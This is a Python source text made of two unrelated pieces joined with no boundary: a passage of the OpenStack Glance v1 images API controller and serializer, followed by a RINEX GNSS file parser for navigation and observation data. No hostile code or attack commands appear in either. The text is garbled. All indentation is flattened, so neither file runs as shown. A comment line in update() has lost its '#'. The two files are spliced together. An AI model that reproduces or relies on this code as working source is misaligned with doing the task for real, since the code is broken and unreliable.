Returns detailed information for all available images
:param req: The WSGI/Webob Request object
:retval The response body is a mapping of the following form::
{'images': [
{'id': <ID>,
'name': <NAME>,
'size': <SIZE>,
'disk_format': <DISK_FORMAT>,
'container_format': <CONTAINER_FORMAT>,
'checksum': <CHECKSUM>,
'min_disk': <MIN_DISK>,
'min_ram': <MIN_RAM>,
'store': <STORE>,
'status': <STATUS>,
'created_at': <TIMESTAMP>,
'updated_at': <TIMESTAMP>,
'deleted_at': <TIMESTAMP>|<NONE>,
'properties': {'distro': 'Ubuntu 10.04 LTS', ...}}, ...
]}
"""
if req.method == 'HEAD':
msg = (_("This operation is currently not permitted on "
"Glance images details."))
raise HTTPMethodNotAllowed(explanation=msg,
headers={'Allow': 'GET'},
body_template='${explanation}')
self._enforce(req, 'get_images')
params = self._get_query_params(req)
try:
images = registry.get_images_detail(req.context, **params)
# Strip out the Location attribute. Temporary fix for
# LP Bug #755916. This information is still coming back
# from the registry, since the API server still needs access
# to it, however we do not return this potential security
# information to the API end user...
for image in images:
redact_loc(image, copy_dict=False)
self._enforce_read_protected_props(image, req)
except exception.Invalid as e:
raise HTTPBadRequest(explanation="%s" % e)
return dict(images=images)
def _get_query_params(self, req):
"""
Extracts necessary query params from request.
:param req: the WSGI Request object
:retval dict of parameters that can be used by registry client
"""
params = {'filters': self._get_filters(req)}
for PARAM in SUPPORTED_PARAMS:
if PARAM in req.params:
params[PARAM] = req.params.get(PARAM)
# Fix for LP Bug #1132294
# Ensure all shared images are returned in v1
params['member_status'] = 'all'
return params
def _get_filters(self, req):
"""
Return a dictionary of query param filters from the request
:param req: the Request object coming from the wsgi layer
:retval a dict of key/value filters
"""
query_filters = {}
for param in req.params:
if param in SUPPORTED_FILTERS or param.startswith('property-'):
query_filters[param] = req.params.get(param)
if not filters.validate(param, query_filters[param]):
raise HTTPBadRequest(_('Bad value passed to filter '
'%(filter)s got %(val)s')
% {'filter': param,
'val': query_filters[param]})
return query_filters
def meta(self, req, id):
"""
Returns metadata about an image in the HTTP headers of the
response object
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:retval similar to 'show' method but without image_data
:raises HTTPNotFound if image metadata is not available to user
"""
self._enforce(req, 'get_image')
image_meta = self.get_image_meta_or_404(req, id)
image_meta = redact_loc(image_meta)
self._enforce_read_protected_props(image_meta, req)
return {
'image_meta': image_meta
}
@staticmethod
def _validate_source(source, req):
"""
External sources (as specified via the location or copy-from headers)
are supported only over non-local store types, i.e. S3, Swift, HTTP.
Note the absence of file:// for security reasons, see LP bug #942118.
If the above constraint is violated, we reject with 400 "Bad Request".
"""
if source:
pieces = urlparse.urlparse(source)
schemes = [scheme for scheme in get_known_schemes()
if scheme != 'file']
for scheme in schemes:
if pieces.scheme == scheme:
return source
msg = "External sourcing not supported for store %s" % source
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
@staticmethod
def _copy_from(req):
return req.headers.get('x-glance-api-copy-from')
def _external_source(self, image_meta, req):
source = image_meta.get('location')
if source is not None:
self._enforce(req, 'set_image_location')
else:
source = Controller._copy_from(req)
return Controller._validate_source(source, req)
@staticmethod
def _get_from_store(context, where):
try:
image_data, image_size = get_from_backend(context, where)
except exception.NotFound as e:
raise HTTPNotFound(explanation=e.msg)
image_size = int(image_size) if image_size else None
return image_data, image_size
def show(self, req, id):
"""
Returns an iterator that can be used to retrieve an image's
data along with the image metadata.
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:raises HTTPNotFound if image is not available to user
"""
self._enforce(req, 'get_image')
self._enforce(req, 'download_image')
image_meta = self.get_active_image_meta_or_404(req, id)
self._enforce_read_protected_props(image_meta, req)
if image_meta.get('size') == 0:
image_iterator = iter([])
else:
image_iterator, size = self._get_from_store(req.context,
image_meta['location'])
image_iterator = utils.cooperative_iter(image_iterator)
image_meta['size'] = size or image_meta['size']
image_meta = redact_loc(image_meta)
return {
'image_iterator': image_iterator,
'image_meta': image_meta,
}
def _reserve(self, req, image_meta):
"""
Adds the image metadata to the registry and assigns
an image identifier if one is not supplied in the request
headers. Sets the image's status to `queued`.
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:param image_meta: The image metadata
:raises HTTPConflict if image already exists
:raises HTTPBadRequest if image metadata is not valid
"""
location = self._external_source(image_meta, req)
store = image_meta.get('store')
if store and store not in get_known_stores():
msg = "Required store %s is invalid" % store
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
content_type='text/plain')
image_meta['status'] = ('active' if image_meta.get('size') == 0
else 'queued')
if location:
try:
store = get_store_from_location(location)
except exception.BadStoreUri:
msg = "Invalid location %s" % location
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
# check the store exists before we hit the registry, but we
# don't actually care what it is at this point
self.get_store_or_400(req, store)
# retrieve the image size from remote store (if not provided)
image_meta['size'] = self._get_size(req.context, image_meta,
location)
else:
# Ensure that the size attribute is set to zero for directly
# uploadable images (if not provided). The size will be set
# to a non-zero value during upload
image_meta['size'] = image_meta.get('size', 0)
try:
image_meta = registry.add_image_metadata(req.context, image_meta)
self.notifier.info("image.create", redact_loc(image_meta))
return image_meta
except exception.Duplicate:
msg = ("An image with identifier %s already exists" %
image_meta['id'])
LOG.debug(msg)
raise HTTPConflict(explanation=msg,
request=req,
content_type="text/plain")
except exception.Invalid as e:
msg = _("Failed to reserve image. Got error: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.debug(line)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden:
msg = "Forbidden to reserve image."
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
def _upload(self, req, image_meta):
"""
Uploads the payload of the request to a backend store in
Glance. If the `x-image-meta-store` header is set, Glance
will attempt to use that scheme; if not, Glance will use the
scheme set by the flag `default_store` to find the backing store.
:param req: The WSGI/Webob Request object
:param image_meta: Mapping of metadata about image
:raises HTTPConflict if image already exists
:retval The location where the image was stored
"""
copy_from = self._copy_from(req)
if copy_from:
try:
image_data, image_size = self._get_from_store(req.context,
copy_from)
except Exception as e:
upload_utils.safe_kill(req, image_meta['id'])
msg = "Copy from external source failed: %s" % e
LOG.debug(msg)
return
image_meta['size'] = image_size or image_meta['size']
else:
try:
req.get_content_type(('application/octet-stream',))
except exception.InvalidContentType:
upload_utils.safe_kill(req, image_meta['id'])
msg = "Content-Type must be application/octet-stream"
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg)
image_data = req.body_file
scheme = req.headers.get('x-image-meta-store', CONF.default_store)
store = self.get_store_or_400(req, scheme)
image_id = image_meta['id']
LOG.debug("Setting image %s to status 'saving'", image_id)
registry.update_image_metadata(req.context, image_id,
{'status': 'saving'})
LOG.debug("Uploading image data for image %(image_id)s "
"to %(scheme)s store", {'image_id': image_id,
'scheme': scheme})
self.notifier.info("image.prepare", redact_loc(image_meta))
image_meta, location, loc_meta = upload_utils.upload_data_to_store(
req, image_meta, image_data, store, self.notifier)
self.notifier.info('image.upload', redact_loc(image_meta))
return location, loc_meta
def _activate(self, req, image_id, location, location_metadata=None,
from_state=None):
"""
Sets the image status to `active` and the image's location
attribute.
:param req: The WSGI/Webob Request object
:param image_id: Opaque image identifier
:param location: Location of where Glance stored this image
:param location_metadata: a dictionary of storage specific information
"""
image_meta = {}
image_meta['location'] = location
image_meta['status'] = 'active'
if location_metadata:
image_meta['location_data'] = [{'url': location,
'metadata': location_metadata}]
try:
s = from_state
image_meta_data = registry.update_image_metadata(req.context,
image_id,
image_meta,
from_state=s)
self.notifier.info("image.activate", redact_loc(image_meta_data))
self.notifier.info("image.update", redact_loc(image_meta_data))
return image_meta_data
except exception.Duplicate:
with excutils.save_and_reraise_exception():
# Delete image data since it has been superseded by another
# upload and re-raise.
LOG.debug("duplicate operation - deleting image data for "
" %(id)s (location:%(location)s)" %
{'id': image_id, 'location': image_meta['location']})
upload_utils.initiate_deletion(req, image_meta['location'],
image_id, CONF.delayed_delete)
except exception.Invalid as e:
msg = "Failed to activate image. Got error: %(e)s" % {'e': e}
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
def _upload_and_activate(self, req, image_meta):
"""
Safely uploads the image data in the request payload
and activates the image in the registry after a successful
upload.
:param req: The WSGI/Webob Request object
:param image_meta: Mapping of metadata about image
:retval Mapping of updated image data
"""
image_id = image_meta['id']
# This is necessary because of a bug in Webob 1.0.2 - 1.0.7
# See: https://bitbucket.org/ianb/webob/
# issue/12/fix-for-issue-6-broke-chunked-transfer
req.is_body_readable = True
location, location_metadata = self._upload(req, image_meta)
return self._activate(req,
image_id,
location,
location_metadata,
from_state='saving') if location else None
def _get_size(self, context, image_meta, location):
# retrieve the image size from remote store (if not provided)
try:
return (image_meta.get('size', 0) or
get_size_from_backend(context, location))
except (exception.NotFound, exception.BadStoreUri) as e:
LOG.debug(e)
raise HTTPBadRequest(explanation=e.msg, content_type="text/plain")
def _handle_source(self, req, image_id, image_meta, image_data):
copy_from = self._copy_from(req)
location = image_meta.get('location')
sources = filter(lambda x: x, (copy_from, location, image_data))
if len(sources) >= 2:
msg = "It's invalid to provide multiple image sources."
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
if image_data:
image_meta = self._validate_image_for_activation(req,
image_id,
image_meta)
image_meta = self._upload_and_activate(req, image_meta)
elif copy_from:
msg = _('Triggering asynchronous copy from external source')
LOG.info(msg)
self.pool.spawn_n(self._upload_and_activate, req, image_meta)
else:
if location:
try:
validate_location(req.context, location)
except (exception.BadStoreUri) as bse:
raise HTTPBadRequest(explanation=unicode(bse),
request=req)
self._validate_image_for_activation(req, image_id, image_meta)
image_size_meta = image_meta.get('size')
if image_size_meta:
image_size_store = get_size_from_backend(req.context,
location)
# NOTE(zhiyan): A returned size of zero usually means
# the driver encountered an error. In this case the
# size provided by the client will be used as-is.
if (image_size_store and
image_size_store != image_size_meta):
msg = ("Provided image size must match the stored "
"image size. (provided size: %(ps)d, "
"stored size: %(ss)d)" % {
"ps": image_size_meta,
"ss": image_size_store})
LOG.debug(msg)
raise HTTPConflict(explanation=msg,
request=req,
content_type="text/plain")
image_meta = self._activate(req, image_id, location)
return image_meta
def _validate_image_for_activation(self, req, id, values):
"""Ensures that all required image metadata values are valid."""
image = self.get_image_meta_or_404(req, id)
if 'disk_format' not in values:
values['disk_format'] = image['disk_format']
if 'container_format' not in values:
values['container_format'] = image['container_format']
if 'name' not in values:
values['name'] = image['name']
values = validate_image_meta(req, values)
return values
@utils.mutating
def create(self, req, image_meta, image_data):
"""
Adds a new image to Glance. Four scenarios exist when creating an
image:
1. If the image data is available directly for upload, create can be
passed the image data as the request body and the metadata as the
request headers. The image will initially be 'queued', during
upload it will be in the 'saving' status, and then 'killed' or
'active' depending on whether the upload completed successfully.
2. If the image data exists somewhere else, you can upload indirectly
from the external source using the x-glance-api-copy-from header.
Once the image is uploaded, the external store is not subsequently
consulted, i.e. the image content is served out from the configured
glance image store. State transitions are as for option #1.
3. If the image data exists somewhere else, you can reference the
source using the x-image-meta-location header. The image content
will be served out from the external store, i.e. is never uploaded
to the configured glance image store.
4. If the image data is not available yet, but you'd like to reserve a
spot for it, you can omit the data and a record will be created in
the 'queued' state. This exists primarily to maintain backwards
compatibility with OpenStack/Rackspace API semantics.
The request body *must* be encoded as application/octet-stream,
otherwise an HTTPBadRequest is returned.
Upon a successful save of the image data and metadata, a response
containing metadata about the image is returned, including its
opaque identifier.
:param req: The WSGI/Webob Request object
:param image_meta: Mapping of metadata about image
:param image_data: Actual image data that is to be stored
:raises HTTPBadRequest if x-image-meta-location is missing
and the request body is not application/octet-stream
image data.
"""
self._enforce(req, 'add_image')
is_public = image_meta.get('is_public')
if is_public:
self._enforce(req, 'publicize_image')
if Controller._copy_from(req):
self._enforce(req, 'copy_from')
if image_data or Controller._copy_from(req):
self._enforce(req, 'upload_image')
self._enforce_create_protected_props(image_meta['properties'].keys(),
req)
self._enforce_image_property_quota(image_meta, req=req)
image_meta = self._reserve(req, image_meta)
id = image_meta['id']
image_meta = self._handle_source(req, id, image_meta, image_data)
location_uri = image_meta.get('location')
if location_uri:
self.update_store_acls(req, id, location_uri, public=is_public)
# Prevent client from learning the location, as it
# could contain security credentials
image_meta = redact_loc(image_meta)
return {'image_meta': image_meta}
@utils.mutating
def update(self, req, id, image_meta, image_data):
"""
Updates an existing image with the registry.
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:retval Returns the updated image information as a mapping
"""
self._enforce(req, 'modify_image')
is_public = image_meta.get('is_public')
if is_public:
self._enforce(req, 'publicize_image')
if Controller._copy_from(req):
self._enforce(req, 'copy_from')
if image_data or Controller._copy_from(req):
self._enforce(req, 'upload_image')
orig_image_meta = self.get_image_meta_or_404(req, id)
orig_status = orig_image_meta['status']
# Do not allow any updates on a deleted image.
# Fix for LP Bug #1060930
if orig_status == 'deleted':
msg = _("Forbidden to update deleted image.")
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
if req.context.is_admin is False:
# Once an image is 'active' only an admin can
# modify certain core metadata keys
for key in ACTIVE_IMMUTABLE:
if (orig_status == 'active' and image_meta.get(key) is not None
and image_meta.get(key) != orig_image_meta.get(key)):
msg = _("Forbidden to modify '%s' of active image.") % key
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
# The default behaviour for a PUT /images/<IMAGE_ID> is to
# override any properties that were previously set. This, however,
# leads to a number of issues for the common use case where a caller
# registers an image with some properties and then almost immediately
# uploads an image file along with some more properties. Here, we
# check for a special header value to be false in order to force
# properties NOT to be purged. However we also disable purging of
# properties if an image file is being uploaded...
purge_props = req.headers.get('x-glance-registry-purge-props', True)
purge_props = (strutils.bool_from_string(purge_props) and
image_data is None)
if image_data is not None and orig_status != 'queued':
raise HTTPConflict(_("Cannot upload to an unqueued image"))
# Only allow the Location|Copy-From fields to be modified if the
# image is in queued status, which indicates that the user called
POST /images but originally supplied neither a Location|Copy-From
# field NOR image data
location = self._external_source(image_meta, req)
reactivating = orig_status != 'queued' and location
activating = orig_status == 'queued' and (location or image_data)
# Make image public in the backend store (if implemented)
orig_or_updated_loc = location or orig_image_meta.get('location')
if orig_or_updated_loc:
try:
self.update_store_acls(req, id, orig_or_updated_loc,
public=is_public)
except exception.BadStoreUri:
msg = "Invalid location %s" % location
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
if reactivating:
msg = _("Attempted to update Location field for an image "
"not in queued status.")
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
# ensure requester has permissions to create/update/delete properties
# according to property-protections.conf
orig_keys = set(orig_image_meta['properties'])
new_keys = set(image_meta['properties'])
self._enforce_update_protected_props(
orig_keys.intersection(new_keys), image_meta,
orig_image_meta, req)
self._enforce_create_protected_props(
new_keys.difference(orig_keys), req)
if purge_props:
self._enforce_delete_protected_props(
orig_keys.difference(new_keys), image_meta,
orig_image_meta, req)
self._enforce_image_property_quota(image_meta,
orig_image_meta=orig_image_meta,
purge_props=purge_props,
req=req)
try:
if location:
image_meta['size'] = self._get_size(req.context, image_meta,
location)
image_meta = registry.update_image_metadata(req.context,
id,
image_meta,
purge_props)
if activating:
image_meta = self._handle_source(req, id, image_meta,
image_data)
except exception.Invalid as e:
msg = ("Failed to update image metadata. Got error: %(e)s" %
{'e': e})
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
except exception.NotFound as e:
msg = _("Failed to find image to update: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.info(line)
raise HTTPNotFound(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden as e:
msg = _("Forbidden to update image: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.info(line)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
except (exception.Conflict, exception.Duplicate) as e:
LOG.info(utils.exception_to_str(e))
raise HTTPConflict(body='Image operation conflicts',
request=req,
content_type='text/plain')
else:
self.notifier.info('image.update', redact_loc(image_meta))
# Prevent client from learning the location, as it
# could contain security credentials
image_meta = redact_loc(image_meta)
self._enforce_read_protected_props(image_meta, req)
return {'image_meta': image_meta}
@utils.mutating
def delete(self, req, id):
"""
Deletes the image and all its chunks from the Glance store.
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:raises HTTPBadRequest if image registry is invalid
:raises HTTPNotFound if image or any chunk is not available
:raises HTTPForbidden if image or any chunk is not
deletable by the requesting user
"""
self._enforce(req, 'delete_image')
image = self.get_image_meta_or_404(req, id)
if image['protected']:
msg = "Image is protected"
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
if image['status'] == 'pending_delete':
msg = "Forbidden to delete a %s image." % image['status']
LOG.debug(msg)
raise HTTPForbidden(explanation=msg, request=req,
content_type="text/plain")
elif image['status'] == 'deleted':
msg = "Image %s not found." % id
LOG.debug(msg)
raise HTTPNotFound(explanation=msg, request=req,
content_type="text/plain")
if image['location'] and CONF.delayed_delete:
status = 'pending_delete'
else:
status = 'deleted'
ori_status = image['status']
try:
# Update the image from the registry first, since we rely on it
# for authorization checks.
# See https://bugs.launchpad.net/glance/+bug/1065187
image = registry.update_image_metadata(req.context, id,
{'status': status})
try:
# The image's location field may be None in the case
# of a saving or queued image, therefore don't ask a backend
# to delete the image if the backend doesn't yet store it.
# See https://bugs.launchpad.net/glance/+bug/747799
if image['location']:
upload_utils.initiate_deletion(req, image['location'], id,
CONF.delayed_delete)
except Exception as e:
registry.update_image_metadata(req.context, id,
{'status': ori_status})
raise e
registry.delete_image_metadata(req.context, id)
except exception.NotFound as e:
msg = _("Failed to find image to delete: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.info(line)
raise HTTPNotFound(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden as e:
msg = _("Forbidden to delete image: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.info(line)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
else:
self.notifier.info('image.delete', redact_loc(image))
return Response(body='', status=200)
def get_store_or_400(self, request, scheme):
"""
Grabs the storage backend for the supplied store name
or raises an HTTPBadRequest (400) response
:param request: The WSGI/Webob Request object
:param scheme: The backend store scheme
:raises HTTPBadRequest if store does not exist
"""
try:
return get_store_from_scheme(request.context, scheme)
except exception.UnknownScheme:
msg = "Store for scheme %s not found" % scheme
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=request,
content_type='text/plain')
class ImageDeserializer(wsgi.JSONRequestDeserializer):
"""Handles deserialization of specific controller method requests."""
def _deserialize(self, request):
result = {}
try:
result['image_meta'] = utils.get_image_meta_from_headers(request)
except exception.InvalidParameterValue as e:
msg = utils.exception_to_str(e)
LOG.warn(msg, exc_info=True)
raise HTTPBadRequest(explanation=e.msg, request=request)
image_meta = result['image_meta']
image_meta = validate_image_meta(request, image_meta)
if request.content_length:
image_size = request.content_length
elif 'size' in image_meta:
image_size = image_meta['size']
else:
image_size = None
data = request.body_file if self.has_body(request) else None
if image_size is None and data is not None:
data = utils.LimitingReader(data, CONF.image_size_cap)
#NOTE(bcwaldon): this is a hack to make sure the downstream code
# gets the correct image data
request.body_file = data
elif image_size > CONF.image_size_cap:
max_image_size = CONF.image_size_cap
msg = _("Denying attempt to upload image larger than %d bytes.")
LOG.warn(msg % max_image_size)
raise HTTPBadRequest(explanation=msg % max_image_size,
request=request)
result['image_data'] = data
return result
def create(self, request):
return self._deserialize(request)
def update(self, request):
return self._deserialize(request)
class ImageSerializer(wsgi.JSONResponseSerializer):
"""Handles serialization of specific controller method responses."""
def __init__(self):
self.notifier = notifier.Notifier()
def _inject_location_header(self, response, image_meta):
location = self._get_image_location(image_meta)
response.headers['Location'] = location.encode('utf-8')
def _inject_checksum_header(self, response, image_meta):
if image_meta['checksum'] is not None:
response.headers['ETag'] = image_meta['checksum'].encode('utf-8')
def _inject_image_meta_headers(self, response, image_meta):
"""
Given a response and mapping of image metadata, injects
the Response with a set of HTTP headers for the image
metadata. Each main image metadata field is injected
as a HTTP header with key 'x-image-meta-<FIELD>' except
for the properties field, which is further broken out
into a set of 'x-image-meta-property-<KEY>' headers
:param response: The Webob Response object
:param image_meta: Mapping of image metadata
"""
headers = utils.image_meta_to_http_headers(image_meta)
for k, v in headers.items():
response.headers[k.encode('utf-8')] = v.encode('utf-8')
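# Hedged example (added for illustration; values are hypothetical): for
# image_meta such as
#   {'id': '1', 'name': 'ubuntu', 'properties': {'arch': 'x86_64'}}
# utils.image_meta_to_http_headers is expected to yield headers like
#   x-image-meta-id: 1
#   x-image-meta-name: ubuntu
#   x-image-meta-property-arch: x86_64
# which the loop above copies onto the Webob response.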
def _get_image_location(self, image_meta):
"""Build a relative url to reach the image defined by image_meta."""
return "/v1/images/%s" % image_meta['id']
def meta(self, response, result):
image_meta = result['image_meta']
self._inject_image_meta_headers(response, image_meta)
self._inject_checksum_header(response, image_meta)
return response
def show(self, response, result):
image_meta = result['image_meta']
image_iter = result['image_iterator']
# image_meta['size'] should be an int, but could possibly be a str
expected_size = int(image_meta['size'])
response.app_iter = common.size_checked_iter(
response, image_meta, expected_size, image_iter, self.notifier)
# Using app_iter blanks content-length, so we set it here...
response.headers['Content-Length'] = str(image_meta['size'])
response.headers['Content-Type'] = 'application/octet-stream'
self._inject_image_meta_headers(response, image_meta)
self._inject_checksum_header(response, image_meta)
return response
def update(self, response, result):
image_meta = result['image_meta']
response.body = self.to_json(dict(image=image_meta))
response.headers['Content-Type'] = 'application/json'
self._inject_checksum_header(response, image_meta)
return response
def create(self, response, result):
image_meta = result['image_meta']
response.status = 201
response.headers['Content-Type'] = 'application/json'
response.body = self.to_json(dict(image=image_meta))
self._inject_location_header(response, image_meta)
self._inject_checksum_header(response, image_meta)
return response
def create_resource():
"""Images resource factory method"""
deserializer = ImageDeserializer()
serializer = ImageSerializer()
return wsgi.Resource(Controller(), deserializer, serializer)
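# Illustrative note (added; the router call below is an assumption, not taken
# from this file): create_resource() is the hook an API router or paste.deploy
# pipeline would use to mount this controller, e.g.
#
#   images_resource = create_resource()
#   mapper.connect("/images", controller=images_resource, action="create",
#                  conditions={"method": ["POST"]})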
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 15 14:15:16 2016
@author of the file: smrak
Authors of the code: Greg Starr and Michael Hirsch
"""
from __future__ import division,absolute_import,print_function
import numpy as np
from datetime import datetime
from pandas import Panel4D, DataFrame, Series
from pandas.io.pytables import read_hdf
from os.path import splitext,expanduser
from io import BytesIO
from os.path import getsize
import yaml
import glob
def writeRinexObsHeader2yaml(folder):
"""
Sebastijan Mrak
Function takes a folder with RINEX observation files and finds all files
with the '.15o' extension. Then it iterates through all files, reads each header and
saves it to a yaml file with the same name.
"""
ext = '*.1*o'
flist = sorted(glob.glob(folder+ext))
for doc in flist:
#print doc
header = readRinexObsHeader(doc)
filename = splitext(expanduser(doc))
yaml_fn = filename[0] + '.yaml'
with open(yaml_fn, 'w') as outfile:
yaml.dump(header, outfile, default_flow_style=True)
def readRinexNav(rinex_nav_filename):
"""
Michael Hirsch
It may actually be faster to read the entire file via f.read() and then .split()
and asarray().reshape() to the final result, but I did it frame by frame.
http://gage14.upc.es/gLAB/HTML/GPS_Navigation_Rinex_v2.11.html
"""
startcol = 3 #column where numerical data starts
nfloat = 19 #number of text elements per float data number
nline = 7 #number of lines per record
with open(expanduser(rinex_nav_filename),'r') as f:
#find end of header, which has non-constant length
while True:
if 'END OF HEADER' in f.readline(): break
#handle frame by frame
sv = []; epoch=[]; raws=''
while True:
headln = f.readline()
if not headln: break
#handle the header
sv.append(headln[:2])
year = int(headln[2:5])
if (80 <= year <= 99):
year+=1900
elif (year < 80): #good till year 2079
year+=2000
epoch.append(datetime(year = year,
month = int(headln[5:8]),
day = int(headln[8:11]),
hour = int(headln[11:14]),
minute = int(headln[14:17]),
second = int(headln[17:20]),
microsecond = int(headln[21])*100000))
"""
now get the data.
Use rstrip() to chomp newlines consistently on Windows and Python 2.7/3.4
Specifically [:-1] doesn't work consistently as .rstrip() does here.
"""
raw = (headln[22:].rstrip() +
''.join(f.readline()[startcol:].rstrip() for _ in range(nline-1))
+f.readline()[startcol:40].rstrip())
raws += raw + '\n'
raws = raws.replace('D','E')
strio = BytesIO(raws.encode())
darr = np.genfromtxt(strio,delimiter=nfloat)
nav= DataFrame(darr, epoch,
['SVclockBias','SVclockDrift','SVclockDriftRate','IODE',
'Crs','DeltaN','M0','Cuc','Eccentricity','Cus','sqrtA','TimeEph',
'Cic','OMEGA','CIS','Io','Crc','omega','OMEGA DOT','IDOT',
'CodesL2','GPSWeek','L2Pflag','SVacc','SVhealth','TGD','IODC',
'TransTime','FitIntvl'])
nav['sv'] = Series(np.asarray(sv,int), index=nav.index)
#print (type(nav))
return nav
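# Minimal usage sketch (added; the file name is hypothetical):
#
#   nav = readRinexNav('brdc0010.16n')
#   print(nav[['sv', 'SVclockBias', 'sqrtA']].head())
#
# readRinexNav returns a pandas DataFrame indexed by epoch, one row per broadcast
# ephemeris record, with the satellite number stored in the 'sv' column.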
def writeRinexObs2Hdf(rinex_obs_file_name, odir=None):
"""
Function writeRinexObs2Hdf takes a RINEX observation data file (.15o) and writes
the observation data into a new hdf (.h5) file in the same folder as the original
RINEX observation data file.
Code is restructured after Greg Starr's rinexObs function
"""
filename,ext = splitext(expanduser(rinex_obs_file_name))
with open(rinex_obs_file_name,'r') as f:
lines = f.read().splitlines(True)
lines.append('')
header,version,headlines,obstimes,sats,svset = scan(lines)
data = processBlocks(lines,header,obstimes,svset,headlines,sats)
h5fn = filename + '.h5'
if odir is not None:
h5fn = odir
data.to_hdf(h5fn,key='data',mode='w',format='table')
print('Write successful. \n {} is a RINEX {} file, {} kB.'.format(
rinex_obs_file_name,version,getsize(rinex_obs_file_name)/1000.0))
def readRinexObsHeader(obs_file_name):
with open(obs_file_name, 'r') as f:
lines = f.read().splitlines(True)
lines.append('')
header,version,headlines,obstimes,sats,svset = scan(lines)
return header
def readRinexObsHdf(hdf5_file_name):
"""
Function readRinexObsHdf opens the input .h5 file with raw data structured in
an hdf file. Besides the restructured observation data in a pandas.Panel4D, the
function finds the original observation rinex data with the .15o extension,
which has to be in the same folder as the hdf file, and reads its header.
The function's output is thus header data structured as a dictionary and
observation data structured as a pandas.Panel4D.
Code is restructured after Greg Starr's rinexObs function
"""
filename, ext = splitext(expanduser(hdf5_file_name))
obs_data_ext = '.15o'
obs_header_file_name = filename + obs_data_ext
with open(obs_header_file_name,'r') as f:
lines = f.read().splitlines(True)
lines.append('')
header,version,headlines,obstimes,sats,svset = scan(lines)
data = read_hdf(hdf5_file_name,key='data')
return header, data, list(svset), obstimes
def scan(lines):
"""
Written by Greg Starr
This function sets up the rinex file parsing by quickly running through
the file, looking for the line at which each time block starts, the time
of each block, the satellites in view at each time, and overall what
satellites are in the rinex file
inputs:
lines - list containing each line in the rinex file as a string
outputs:
header - all the header info in a dictionary
verRinex - the rinex file's version
headlines - a list of ints, the index of lines where each time block
starts
obstimes - list of times corresponding to each block, same length as
headlines
sats - the satellites in view at each time, should be same length
as headlines
svset - the set of all the satellites in the rinex file
"""
header={}
eoh=0
for i,line in enumerate(lines):
if "END OF HEADER" in line:
eoh=i
break
if line[60:].strip() not in header:
header[line[60:].strip()] = line[:60].strip()
else:
header[line[60:].strip()] += " "+line[:60].strip()
verRinex = float(header['RINEX VERSION / TYPE'].split()[0])
header['APPROX POSITION XYZ'] = [float(i) for i in header[
'APPROX POSITION XYZ'].split()]
header['# / TYPES OF OBSERV'] = header['# / TYPES OF OBSERV'].split()
header['# / TYPES OF OBSERV'][0] = int(header['# / TYPES OF OBSERV'][0])
header['INTERVAL'] = float(header['INTERVAL'])
headlines=[]
obstimes=[]
sats=[]
svset=set()
i = eoh + 1
while True:
if not lines[i]: break
if not int(lines[i][28]):
#no flag or flag=0
headlines.append(i)
obstimes.append(_obstime([lines[i][1:3],lines[i][4:6],
lines[i][7:9],lines[i][10:12],
lines[i][13:15],lines[i][16:26]]))
numsvs = int(lines[i][30:32])
if(numsvs > 12):
sp=[]
for s in range(numsvs):
if s == 12 :
i += 1
sp.append(int(lines[i][33+(s%12)*3:35+(s%12)*3]))
sats.append(sp)
else:
sats.append([int(lines[i][33+s*3:35+s*3]) for s in range(numsvs)])
i+=numsvs*int(np.ceil(header['# / TYPES OF OBSERV'][0]/5))+1
else:
#there was a comment or some header info
flag=int(lines[i][28])
if(flag!=4):
print(flag)
skip=int(lines[i][30:32])
i+=skip+1
for sv in sats:
svset = svset.union(set(sv))
return header,verRinex,headlines,obstimes,sats,svset
def _obstime(fol):
"""
Written by Greg Starr
turns a listed date collected from the rinex file into a datetime,
this is just a utility function.
"""
year = int(fol[0])
if (80 <= year <= 99):
year+=1900
elif (year < 80): #because we might pass in four-digit year
year+=2000
return datetime(year = year, month = int(fol[1]), day = int(fol[2]),
hour = int(fol[3]), minute = int(fol[4]),
second = int(float(fol[5])),
microsecond = int((float(fol[5]) % 1) * 1000000)  # fractional seconds -> microseconds
)
def _block2df(block,obstypes,svnames,svnum):
"""
input: block of text corresponding to one time increment INTERVAL of
RINEX file output: 2-D array of float64 data from block. Future: consider
whether best to use Numpy, Pandas, or Xray.
"""
nobs = len(obstypes)
stride = 3
strio = BytesIO(block.encode())
barr = np.genfromtxt(strio, delimiter=(14,1,1)*5).reshape((svnum,-1),
order='C')
data = barr[:,0:nobs*stride:stride]
lli = barr[:,1:nobs*stride:stride]
ssi = barr[:,2:nobs*stride:stride]
data = np.vstack(([data],[lli],[ssi])).T
return data
